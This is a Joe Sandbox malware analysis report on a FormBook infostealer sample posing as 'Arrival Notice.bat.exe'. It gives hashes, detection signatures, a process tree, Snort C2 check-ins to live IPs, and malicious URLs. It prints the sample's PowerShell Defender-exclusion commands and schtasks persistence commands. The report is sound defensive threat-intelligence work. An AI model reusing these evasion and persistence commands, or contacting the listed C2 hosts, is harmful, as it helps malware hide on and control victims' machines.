Windows Analysis Report
Arrival Notice.bat.exe

Overview

General Information

Sample name: Arrival Notice.bat.exe
Analysis ID: 1459718
MD5: 615f92f0ecef4eb70de1c52cee091948
SHA1: 8213ac015b088c484e7fff3317e4e32d91b933cf
SHA256: 48dcd87fc8e5dca5caa5788ee49d6cbdf1f8c76f789b2fd619665a07af9b5c57
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Arrival Notice.bat.exe (PID: 6712 cmdline: "C:\Users\user\Desktop\Arrival Notice.bat.exe" MD5: 615F92F0ECEF4EB70DE1C52CEE091948)
    • powershell.exe (PID: 7172 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7220 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dLrZsz.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7572 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7276 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Arrival Notice.bat.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\Arrival Notice.bat.exe" MD5: 615F92F0ECEF4EB70DE1C52CEE091948)
      • WRrRgOfpwFEFXfaWUCsdTxK.exe (PID: 352 cmdline: "C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • compact.exe (PID: 8036 cmdline: "C:\Windows\SysWOW64\compact.exe" MD5: 5CB107F69062D6D387F4F7A14737220E)
          • WRrRgOfpwFEFXfaWUCsdTxK.exe (PID: 5740 cmdline: "C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7332 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
          • -6qxw.exe (PID: 7772 cmdline: "C:\Users\user\AppData\Local\Temp\-6qxw.exe" MD5: BD0CF4524C08026BA27005393E1F93A9)
            • -6qxw.exe (PID: 3164 cmdline: "C:\Users\user\AppData\Local\Temp\-6qxw.exe" MD5: BD0CF4524C08026BA27005393E1F93A9)
            • -6qxw.exe (PID: 2700 cmdline: "C:\Users\user\AppData\Local\Temp\-6qxw.exe" MD5: BD0CF4524C08026BA27005393E1F93A9)
              • WRrRgOfpwFEFXfaWUCsdTxK.exe (PID: 5812 cmdline: "C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                • runonce.exe (PID: 6680 cmdline: "C:\Windows\SysWOW64\runonce.exe" MD5: 9E16655119DDE1B24A741C4FD4AD08FC)
                  • WRrRgOfpwFEFXfaWUCsdTxK.exe (PID: 1860 cmdline: "C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                  • firefox.exe (PID: 7668 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • dLrZsz.exe (PID: 7468 cmdline: C:\Users\user\AppData\Roaming\dLrZsz.exe MD5: 615F92F0ECEF4EB70DE1C52CEE091948)
    • schtasks.exe (PID: 7712 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmpEFDB.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dLrZsz.exe (PID: 7756 cmdline: "C:\Users\user\AppData\Roaming\dLrZsz.exe" MD5: 615F92F0ECEF4EB70DE1C52CEE091948)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000018.00000002.3466776622.00000000010B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000018.00000002.3466776622.00000000010B0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2aef0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x144bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000001A.00000002.4145607762.0000000000D10000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000001A.00000002.4145607762.0000000000D10000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2aef0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x144bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.2005620217.00000000018D0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
8.2.Arrival Notice.bat.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
8.2.Arrival Notice.bat.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2d2b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16812:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
8.2.Arrival Notice.bat.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
8.2.Arrival Notice.bat.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e0b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17612:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
24.2.-6qxw.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice.bat.exe", ParentImage: C:\Users\user\Desktop\Arrival Notice.bat.exe, ParentProcessId: 6712, ParentProcessName: Arrival Notice.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe", ProcessId: 7172, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmpEFDB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmpEFDB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\dLrZsz.exe, ParentImage: C:\Users\user\AppData\Roaming\dLrZsz.exe, ParentProcessId: 7468, ParentProcessName: dLrZsz.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmpEFDB.tmp", ProcessId: 7712, ProcessName: schtasks.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice.bat.exe", ParentImage: C:\Users\user\Desktop\Arrival Notice.bat.exe, ParentProcessId: 6712, ParentProcessName: Arrival Notice.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp", ProcessId: 7276, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice.bat.exe", ParentImage: C:\Users\user\Desktop\Arrival Notice.bat.exe, ParentProcessId: 6712, ParentProcessName: Arrival Notice.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Arrival Notice.bat.exe", ProcessId: 7172, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice.bat.exe", ParentImage: C:\Users\user\Desktop\Arrival Notice.bat.exe, ParentProcessId: 6712, ParentProcessName: Arrival Notice.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dLrZsz" /XML "C:\Users\user\AppData\Local\Temp\tmp4908.tmp", ProcessId: 7276, ProcessName: schtasks.exe

AV Detection

Source: https://shahaf3d.com/wp-admin/admin-ajax.php, Avira URL Cloud: Label: malware
Source: http://www.931951.com/2ha1/, Avira URL Cloud: Label: malware
Source: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css, Avira URL Cloud: Label: malware
Source: http://www.shahaf3d.com/0a9p/, Avira URL Cloud: Label: malware
Source: http://www.931951.com/2ha1/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=r6q+x3A/FEQLw6gnIIDKqn7cXK90QEz4MeLNvFaSJRcJ7hS0Yil9+YspC9bp8TGkQ6fd6C5Pq3eWOBjFGqN2KETivrZrq09Pe+ZYF4dhJGLDVCdvvTj0Vf0=, Avira URL Cloud: Label: malware
Source: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/countdown/style.css?v=4.1., Avira URL Cloud: Label: malware
Source: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/js/external/vidim.min.js?v=1.0.2, Avira URL Cloud: Label: malware
Source: https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpg, Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\OdR8akYyHwr3ISR[1].exe, ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe, ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Roaming\dLrZsz.exe, ReversingLabs: Detection: 26%
Source: Arrival Notice.bat.exe, ReversingLabs: Detection: 26%
Source: Yara match, File source: 8.2.Arrival Notice.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.Arrival Notice.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 24.2.-6qxw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 24.2.-6qxw.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe, Joe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\OdR8akYyHwr3ISR[1].exe, Joe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe, Joe Sandbox ML: detected
              Source: Arrival Notice.bat.exe, Joe Sandbox ML: detected
              Source: Arrival Notice.bat.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Arrival Notice.bat.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: compact.pdbGCTL source: Arrival Notice.bat.exe, 00000008.00000002.2003995560.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000002.4144521015.0000000001488000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000000.1929042944.00000000003CE000.00000002.00000001.01000000.0000000E.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000000.2071219488.00000000003CE000.00000002.00000001.01000000.0000000E.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000019.00000000.3388459052.00000000003CE000.00000002.00000001.01000000.0000000E.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 0000001B.00000000.3532932698.00000000003CE000.00000002.00000001.01000000.0000000E.sdmp
              Source: Binary string: runonce.pdbGCTL source: -6qxw.exe, 00000018.00000002.3465848130.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000019.00000002.4144533509.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tZby.pdb source: Arrival Notice.bat.exe, dLrZsz.exe.0.dr
              Source: Binary string: wntdll.pdbUGP source: Arrival Notice.bat.exe, 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000012.00000002.4146136991.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000012.00000003.2003900659.0000000002837000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000003.2005695081.00000000029EB000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000002.4146136991.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4146272904.0000000004A8E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3467174209.000000000473C000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3464510823.0000000004587000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4146272904.00000000048F0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: FPJa.pdbSHA256$ source: OdR8akYyHwr3ISR[1].exe.18.dr, -6qxw.exe.18.dr
              Source: Binary string: wntdll.pdb source: Arrival Notice.bat.exe, Arrival Notice.bat.exe, 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000012.00000002.4146136991.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000012.00000003.2003900659.0000000002837000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000003.2005695081.00000000029EB000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000002.4146136991.0000000002D3E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4146272904.0000000004A8E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3467174209.000000000473C000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3464510823.0000000004587000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4146272904.00000000048F0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: tZby.pdbSHA2562 source: Arrival Notice.bat.exe, dLrZsz.exe.0.dr
              Source: Binary string: compact.pdb source: Arrival Notice.bat.exe, 00000008.00000002.2003995560.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000011.00000002.4144521015.0000000001488000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: runonce.pdb source: -6qxw.exe, 00000018.00000002.3465848130.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000019.00000002.4144533509.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: FPJa.pdb source: OdR8akYyHwr3ISR[1].exe.18.dr, -6qxw.exe.18.dr
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe, Code function: 4x nop then jmp 0822890Ch, 0_2_08228B64

              Networking

              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49743 -> 195.35.39.119:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49743 -> 195.35.39.119:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49745 -> 162.241.2.254:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49746 -> 162.241.2.254:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49748 -> 162.241.2.254:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49748 -> 162.241.2.254:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49749 -> 185.137.235.193:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49750 -> 185.137.235.193:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49752 -> 185.137.235.193:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49752 -> 185.137.235.193:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49753 -> 64.46.118.35:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49754 -> 64.46.118.35:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49756 -> 64.46.118.35:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49756 -> 64.46.118.35:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49757 -> 13.228.81.39:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49758 -> 13.228.81.39:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49760 -> 13.228.81.39:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49760 -> 13.228.81.39:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49761 -> 162.0.213.94:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49762 -> 162.0.213.94:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49764 -> 162.0.213.94:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49764 -> 162.0.213.94:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49765 -> 185.234.72.101:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49766 -> 172.82.177.221:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49767 -> 172.82.177.221:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49769 -> 172.82.177.221:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49769 -> 172.82.177.221:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49770 -> 15.204.0.108:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49771 -> 15.204.0.108:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49773 -> 15.204.0.108:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49773 -> 15.204.0.108:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49774 -> 194.9.94.86:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49775 -> 194.9.94.86:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49777 -> 194.9.94.86:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49777 -> 194.9.94.86:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49778 -> 35.214.235.206:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49779 -> 35.214.235.206:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49780 -> 162.241.253.174:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49782 -> 35.214.235.206:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49782 -> 35.214.235.206:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49783 -> 202.95.21.152:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49784 -> 18.178.206.118:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49785 -> 202.95.21.152:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49786 -> 18.178.206.118:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49789 -> 202.95.21.152:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49790 -> 18.178.206.118:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49790 -> 18.178.206.118:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49791 -> 66.96.162.149:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49792 -> 66.96.162.149:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49794 -> 66.29.145.248:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49795 -> 66.96.162.149:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49795 -> 66.96.162.149:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49796 -> 66.29.145.248:80
              Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49798 -> 66.29.145.248:80
